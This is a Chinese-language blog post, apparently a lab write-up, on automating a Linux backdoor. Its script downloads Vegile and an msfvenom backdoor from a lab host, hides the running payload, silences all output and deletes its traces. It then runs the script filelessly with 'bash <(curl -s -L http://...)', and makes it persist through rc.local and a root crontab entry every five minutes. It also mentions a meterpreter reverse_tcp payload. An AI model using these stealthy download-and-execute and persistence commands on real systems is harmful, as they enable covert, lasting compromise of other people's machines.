利用bash脚本自动化创建linux后门
思路
1.准备好木马程序backdoor放到/var/www/html目录下。
2.编写自动化脚本
1)在/var/www/html下创建脚本
2) 切换到工作目录
3) 用&&
命令符把vegile执行后门命令的步骤用&&
拼接。&&上一条执行成功后再执行&&后的下一条。
4) 因为vegile有个步骤是按任意键退出,所以需要使用到命令符echo y |
5.) 因为要隐蔽进行,不能显示输出结果,所以要用到命令>> /dev/null 2>&1
6) 最后删除vegile的所有包
3.执行自动化命令bash < (curl -s -L http://192.168.72.131/autobackdoor.sh) >> /dev/null 2>&1
4.也可以将后门执行命令添加到开机启动项
实验开始
1.准备后门,用msfvenom编写了一个backdoor的后门。上传了Vegile-master.zip。
2.编写bash自动化脚本
代码如下:
#切换目录
cd /tmp/
#将Vegile隐藏执行后门的步骤用&&连接
#隐藏执行命令 >> /dev/null 2>&1
#Velige中需要按任意键退出,所以使用命令 echo y |
wget 192.168.72.136/Vegile-master.zip && unzip Vegile-master.zip && cd Vegile-master && wget 192.168.72.136/backdoor && chmod +x Vegile && chmod +x backdoor && echo y | ./Vegile --i backdoor >> /dev/null 2>&1
#删除安装包
rm -rf /tmp/Vegile-master.zip /tmp/Vegile-master
3.运行自动化脚本
代码如下:
bash <(curl -s -L http://192.168.72.136/autobackdoor.sh) >> /dev/null 2>&1
curl -s -L #curl 是一个利用 URL 语法在命令行下迚行文件传输的工具,这样好处是:本地丌会保存任何文件。
-s --silent #表示静默模式不输出任何内容
-L 跟 http 违接,组合使用的效果是把 http 违接中的文件下载到内存中,然后传 bash,迚行执行。>> /dev/null 2>&1
不输出任何信息
4.也可以将后门执行命令添加到开机启动项
先给rc.load添加执行权限,因为有的centos的rc.load没有权限。chmod +x /etc/rc.d/rc.local
添加到启动项中echo "bash <(curl -s -L http://192.168.72.136/autobackdoor.sh) >> /dev/null 2>&1" /etc/rc.d/rc.local
5.也可以将后门添加到计划任务中
1.先给/etc/crontab授权。
vim /etc/crontab
2.将后门执行命令添加到计划任务中。*/5 * * * * root bash <(curl -s -L http://192.168.72.136/autobackdoor) >> /dev/null 2>&1
保存退出就可以了。表示每五分钟执行一次。
分 时 天 月 周
*/5 * * * *
注意:
分 时 天 月 周
*/5 * * * *
实验时犯的错:
1.获取shell的时候把set payload linux/x64/meterpreter/reverse_tcp
中的x64写成了x86导致shell一直连接不上。
2.常把bash脚本的后缀名.sh忘掉。
3.在编写.sh脚本的时候,要注意以下这个坑。
上一篇: 排序算法-选择排序(java)
下一篇: Java 排序算法 — 希尔排序